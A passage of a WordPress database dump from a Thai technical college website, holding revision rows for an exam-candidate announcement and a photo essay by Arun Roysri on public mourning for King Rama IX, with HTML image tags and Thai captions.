(4355, 3, '2018-11-12 12:48:07', '2018-11-12 05:48:07', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '4353-revision-v1', '', '', '2018-11-12 12:48:07', '2018-11-12 05:48:07', '', 4353, 'http://www.technicrayong.ac.th/4353-revision-v1/', 0, 'revision', '', 0),
(4357, 3, '2018-11-12 13:10:59', '2018-11-12 06:10:59', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 13:10:59', '2018-11-12 06:10:59', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4358, 3, '2018-11-12 13:20:04', '2018-11-12 06:20:04', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-full\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-full\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-full\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-full\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-full\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-full\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-full\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-full\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-full\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-full\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-full\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-full\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-full\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-full\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"675\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-full\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-full\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-full\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p 